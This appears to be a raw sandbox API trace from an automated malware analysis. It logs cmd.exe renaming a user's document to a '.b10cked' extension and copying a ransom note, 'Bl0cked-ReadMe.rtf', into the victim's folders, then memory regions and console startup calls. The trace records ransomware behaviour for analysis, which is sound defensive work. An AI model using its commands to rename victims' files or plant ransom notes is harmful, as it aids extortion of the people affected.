lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT", nBufferLength=0x104, lpBuffer=0x22ece4, lpFilePart=0x22eccc | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT", lpFilePart=0x22eccc*="VAFVM9~1.ODT") returned 0x3f [0142.612] SetErrorMode (uMode=0x0) returned 0x1 [0142.612] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1")) returned 0x12 [0142.613] _wcsicmp (_String1="VAFVM9~1.ODT", _String2=".") returned 72 [0142.613] _wcsicmp (_String1="VAFVM9~1.ODT", _String2="..") returned 72 [0142.613] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\vafvm9~1.odt")) returned 0x20 [0142.613] SetErrorMode (uMode=0x0) returned 0x0 [0142.613] SetErrorMode (uMode=0x1) returned 0x0 [0142.613] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT", nBufferLength=0x104, lpBuffer=0x22f160, lpFilePart=0x22eef8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT", lpFilePart=0x22eef8*="VAFVM9~1.ODT") returned 0x3f [0142.613] SetErrorMode (uMode=0x0) returned 0x1 [0142.613] SetErrorMode (uMode=0x0) returned 0x0 [0142.613] SetErrorMode (uMode=0x1) returned 0x0 [0142.613] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked", nBufferLength=0x104, lpBuffer=0x22f368, lpFilePart=0x22eef8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked", lpFilePart=0x22eef8*="vaFvM9aFd9qECGT.odt.b10cked") returned 0x4e [0142.613] SetErrorMode (uMode=0x0) returned 0x1 [0142.613] SetLastError (dwErrCode=0x0) [0142.613] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\vafvm9afd9qecgt.odt.b10cked")) returned 0xffffffff [0142.613] GetLastError () returned 0x2 [0142.613] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT", fInfoLevelId=0x1, lpFindFileData=0x22e874, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e874) returned 0x3f2188 [0142.614] FindNextFileW (in: hFindFile=0x3f2188, lpFindFileData=0x22e874 | out: lpFindFileData=0x22e874) returned 0 [0142.614] GetLastError () returned 0x12 [0142.614] FindClose (in: hFindFile=0x3f2188 | out: hFindFile=0x3f2188) returned 1 [0142.616] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT", fInfoLevelId=0x1, lpFindFileData=0x3f1d18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3f1d18) returned 0x3f2188 [0142.616] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked", nBufferLength=0x104, lpBuffer=0x22eb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked", lpFilePart=0x0) returned 0x4e [0142.616] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt", nBufferLength=0x104, lpBuffer=0x22eb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt", lpFilePart=0x0) returned 0x46 [0142.616] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\vafvm9afd9qecgt.odt")) returned 0x20 [0142.616] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\vafvm9afd9qecgt.odt"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\vafvm9afd9qecgt.odt.b10cked"), dwFlags=0x3) returned 1 [0142.617] FindClose (in: hFindFile=0x3f2188 | out: hFindFile=0x3f2188) returned 1 [0142.617] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x22eac0 | out: _Buffer=" 1") returned 9 [0142.617] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.617] GetFileType (hFile=0x7) returned 0x2 [0142.617] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.617] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22ea4c | out: lpMode=0x22ea4c) returned 1 [0142.617] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.617] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x22ea80 | out: lpConsoleScreenBufferInfo=0x22ea80) returned 1 [0142.617] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0142.618] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x22eac0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0142.618] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x22eaa4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22eaa4*=0x1a) returned 1 [0142.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.618] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.618] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.618] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.618] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.618] SetConsoleInputExeNameW () returned 0x1 [0142.618] GetConsoleOutputCP () returned 0x1b5 [0142.618] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.618] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.619] exit (_Code=0) Process: id = "166" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xec0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14812 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14813 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14814 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14815 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 14816 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14817 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14818 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14819 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14820 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14821 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15618 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15619 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15620 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15621 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 15622 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 15623 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15624 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15625 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15626 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15627 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15628 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15629 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15630 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15631 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15632 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 15633 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15634 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15635 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15636 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 15637 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15638 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 15639 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 15640 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 15641 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Thread: id = 223 os_tid = 0xf20 [0140.318] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fbb4 | out: lpSystemTimeAsFileTime=0x28fbb4*(dwLowDateTime=0x8d92a660, dwHighDateTime=0x1d440a9)) [0140.318] GetCurrentProcessId () returned 0xec0 [0140.318] GetCurrentThreadId () returned 0xf20 [0140.318] GetTickCount () returned 0x2c10d [0140.318] QueryPerformanceCounter (in: lpPerformanceCount=0x28fbac | out: lpPerformanceCount=0x28fbac*=19710746904) returned 1 [0140.319] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.319] __set_app_type (_Type=0x1) [0140.319] __p__fmode () returned 0x76b331f4 [0140.319] __p__commode () returned 0x76b331fc [0140.319] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.319] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.319] GetCurrentThreadId () returned 0xf20 [0140.320] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf20) returned 0x38 [0140.320] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.320] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.320] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.320] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.320] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fb44 | out: phkResult=0x28fb44*=0x0) returned 0x2 [0140.320] VirtualQuery (in: lpAddress=0x28fb7b, lpBuffer=0x28fb14, dwLength=0x1c | out: lpBuffer=0x28fb14*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.320] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fb14, dwLength=0x1c | out: lpBuffer=0x28fb14*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.320] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fb14, dwLength=0x1c | out: lpBuffer=0x28fb14*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.320] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fb14, dwLength=0x1c | out: lpBuffer=0x28fb14*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.320] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fb14, dwLength=0x1c | out: lpBuffer=0x28fb14*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.320] GetConsoleOutputCP () returned 0x1b5 [0140.320] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.321] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.321] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.321] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.321] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.321] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.321] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.321] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.324] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.324] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.324] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.324] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.324] GetEnvironmentStringsW () returned 0x4001b8* [0140.325] FreeEnvironmentStringsW (penv=0x4001b8) returned 1 [0140.325] GetEnvironmentStringsW () returned 0x4001b8* [0140.325] FreeEnvironmentStringsW (penv=0x4001b8) returned 1 [0140.325] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28eab4 | out: phkResult=0x28eab4*=0x40) returned 0x0 [0140.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x0, lpData=0x28eac0*=0xf0, lpcbData=0x28eab8*=0x1000) returned 0x2 [0140.325] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x4, lpData=0x28eac0*=0x1, lpcbData=0x28eab8*=0x4) returned 0x0 [0140.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x0, lpData=0x28eac0*=0x1, lpcbData=0x28eab8*=0x1000) returned 0x2 [0140.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x4, lpData=0x28eac0*=0x0, lpcbData=0x28eab8*=0x4) returned 0x0 [0140.325] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x4, lpData=0x28eac0*=0x40, lpcbData=0x28eab8*=0x4) returned 0x0 [0140.325] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x4, lpData=0x28eac0*=0x40, lpcbData=0x28eab8*=0x4) returned 0x0 [0140.325] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x0, lpData=0x28eac0*=0x40, lpcbData=0x28eab8*=0x1000) returned 0x2 [0140.325] RegCloseKey (hKey=0x40) returned 0x0 [0140.325] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28eab4 | out: phkResult=0x28eab4*=0x40) returned 0x0 [0140.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x0, lpData=0x28eac0*=0x40, lpcbData=0x28eab8*=0x1000) returned 0x2 [0140.326] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x4, lpData=0x28eac0*=0x1, lpcbData=0x28eab8*=0x4) returned 0x0 [0140.326] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x0, lpData=0x28eac0*=0x1, lpcbData=0x28eab8*=0x1000) returned 0x2 [0140.326] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x4, lpData=0x28eac0*=0x0, lpcbData=0x28eab8*=0x4) returned 0x0 [0140.326] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x4, lpData=0x28eac0*=0x9, lpcbData=0x28eab8*=0x4) returned 0x0 [0140.326] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x4, lpData=0x28eac0*=0x9, lpcbData=0x28eab8*=0x4) returned 0x0 [0140.326] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x0, lpData=0x28eac0*=0x9, lpcbData=0x28eab8*=0x1000) returned 0x2 [0140.326] RegCloseKey (hKey=0x40) returned 0x0 [0140.326] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0140.326] srand (_Seed=0x5b88636e) [0140.326] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" [0140.326] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" [0140.326] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.326] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x401918, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.327] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.327] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.327] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.327] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.327] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.327] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.327] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.327] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.327] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.327] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.327] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.327] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.327] GetEnvironmentStringsW () returned 0x402308* [0140.327] FreeEnvironmentStringsW (penv=0x402308) returned 1 [0140.327] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.327] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.327] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.327] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.327] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.327] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.327] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.327] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.328] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.328] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.328] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f880 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.328] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f880, lpFilePart=0x28f87c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f87c*="Desktop") returned 0x18 [0140.328] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.328] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f5fc | out: lpFindFileData=0x28f5fc) returned 0x400048 [0140.328] FindClose (in: hFindFile=0x400048 | out: hFindFile=0x400048) returned 1 [0140.328] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f5fc | out: lpFindFileData=0x28f5fc) returned 0x400048 